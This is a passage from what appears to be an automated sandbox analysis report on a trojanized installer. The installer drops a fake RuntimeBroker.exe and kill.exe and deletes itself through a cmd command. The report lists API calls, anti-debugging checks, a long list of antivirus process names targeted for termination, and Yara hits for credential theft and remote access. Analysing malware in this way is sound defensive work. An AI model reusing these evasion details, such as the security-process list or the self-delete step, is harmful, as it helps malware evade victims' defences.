ar_traits@_W@std@@V?$allocator@_W@2@@st
d@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?set_game_launcher_flag@common@ierd_tgp@@YAX_N@Z,?set_game_launcher_msg@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_launcher_info@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?is_offline_mode_on@common@ierd_tgp@@YA_NXZ,?set_game_launcher_flag@common@ierd_tgp@@YAX_N@Z,?set_game_launcher_msg@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?IsSubWegameProcess@util_multi_instance@ierd_tgp@@YA_NXZ,PathFileExistsW,PathFileExistsW,DeleteFileW,PathFileExistsW,?get_log_instance@base@@YAPAVILogge3_2_0046CA3B
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00462478 __EH_prolog3_GS,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,SimpleUString::operator=,?extract_name@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z,OpenProcess,SetLastError,TerminateProcess,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,CloseHandle,Process32NextW,CloseHandle,3_2_00462478
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00462960 __EH_prolog3_GS,memset,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ,??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z,GetPrivateProfileStringW,GetPrivateProfileStringW,memset,GetPrivateProfileStringW,SimpleUString::operator=,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,SimpleUString::operator=,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z,??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z,PathFileExistsW,PathFileExistsA,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,LoadLibraryW,GetProcAddress,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_00462960
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005EE5D0 mov eax, dword ptr fs:[00000030h]6_2_005EE5D0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005E4E4B mov eax, dword ptr fs:[00000030h]6_2_005E4E4B
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_03520B11 mov eax, dword ptr fs:[00000030h]6_2_03520B11
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005E6814 GetProcessHeap,6_2_005E6814
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046E9C2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0046E9C2
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046F8AB IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0046F8AB
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046FA0D SetUnhandledExceptionFilter,3_2_0046FA0D
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_003B17CE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,4_2_003B17CE
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7B6001 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C7B6001
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7BBB50 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C7BBB50
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DAF11 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_005DAF11
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DB060 SetUnhandledExceptionFilter,6_2_005DB060
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DB0B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_005DB0B5
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DFF5E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_005DFF5E
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_6C6B21BA IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_6C6B21BA
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Users\Wegame\Wegame.exe "C:\users\Wegame\Wegame.exe"
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Users\Statr\kill.exe "C:\users\Statr\kill.exe"
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\ProgramData\RuntimeBroker.exe "C:\ProgramData\RuntimeBroker.exe"
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00401165 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,3_2_00401165
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046F704 cpuid 3_2_0046F704
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,3_2_10023D68
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,3_2_10027DBB
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoA,MultiByteToWideChar,3_2_10027E78
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,3_2_10027ECE
                    Source: C:\Users\Wegame\Wegame.exeCode function: EnumSystemLocalesA,3_2_10023F3D
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoW,WideCharToMultiByte,3_2_10027F91
                    Source: C:\Users\Wegame\Wegame.exeCode function: EnumSystemLocalesA,3_2_100241C8
                    Source: C:\Users\Wegame\Wegame.exeCode function: EnumSystemLocalesA,3_2_100242DB
                    Source: C:\Users\Wegame\Wegame.exeCode function: GetLocaleInfoA,3_2_100244CF
                    Source: C:\Users\Statr\kill.exeCode function: GetLocaleInfoA,4_2_6C7C3C77
                    Source: C:\Users\Statr\kill.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_6C7BC42E
                    Source: C:\Users\Statr\kill.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,4_2_6C7B965A
                    Source: C:\Users\Statr\kill.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6C7BFEB8
                    Source: C:\Users\Statr\kill.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_6C7BF748
                    Source: C:\Users\Statr\kill.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_6C7BFFAD
                    Source: C:\Users\Statr\kill.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_6C7C0054
                    Source: C:\Users\Statr\kill.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_6C7C00AF
                    Source: C:\Users\Statr\kill.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_6C7C2947
                    Source: C:\Users\Statr\kill.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_6C7BFA36
                    Source: C:\Users\Statr\kill.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_6C7C2A21
                    Source: C:\Users\Statr\kill.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_6C7BEAEC
                    Source: C:\Users\Statr\kill.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_6C7C0280
                    Source: C:\Users\Statr\kill.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_6C7C0340
                    Source: C:\Users\Statr\kill.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,4_2_6C7C3B42
                    Source: C:\Users\Statr\kill.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_6C7C03E3
                    Source: C:\Users\Statr\kill.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_6C7C03A7
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,6_2_005F4080
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_005F41A9
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,6_2_005F42B1
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_005F4384
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: EnumSystemLocalesW,6_2_005EC94A
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetCurrentProcess,TerminateProcess,RevertToSelf,GetCurrentProcess,TerminateProcess,GetCurrentProcess,TerminateProcess,RegDisablePredefinedCache,GetCurrentProcess,TerminateProcess,GetUserDefaultLangID,GetUserDefaultLCID,GetUserDefaultLocaleName,GetCurrentProcess,TerminateProcess,EnumSystemLocalesEx,HeapDestroy,GetCurrentProcess,TerminateProcess,GetCurrentProcess,TerminateProcess,6_2_00572CD0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,6_2_005ECE98
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_005F3A39
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,6_2_005F3C13
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: EnumSystemLocalesW,6_2_005F3CBC
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: EnumSystemLocalesW,6_2_005F3D07
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: EnumSystemLocalesW,6_2_005F3DA2
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_005F3E30
                    Source: C:\Users\Wegame\Wegame.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0058CBB6 CreateNamedPipeW,GetCurrentProcess,DuplicateHandle,6_2_0058CBB6
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0043E902 __EH_prolog3_GS,PathFileExistsW,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,SHCreateDirectoryExW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,PathFileExistsW,CreateFileW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,memset,ReadFile,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLocalTime,WriteFile,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,CloseHandle,3_2_0043E902
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_10022972 InterlockedDecrement,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_10022972
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_1001B811 GetVersion,GetCommandLineA,3_2_1001B811
                    Source: C:\Users\Wegame\Wegame.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avcenter.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: F-PROT.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: spidernt.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nspupsvc.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsmon.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kxetray.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cpf.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: F-PROT.EXE
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 360tray.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ashDisp.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SBAMSvc.exe
                    Source: kill.exe Binary or memory string: 360Tray.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a2guard.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AYAgent.aye
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QUHLPSVC.EXE
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: RavMonD.exe
                    Source: RuntimeBroker.exe, RuntimeBroker.exe, 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Mcshield.exe

                    Stealing of Sensitive Information

                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3728, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
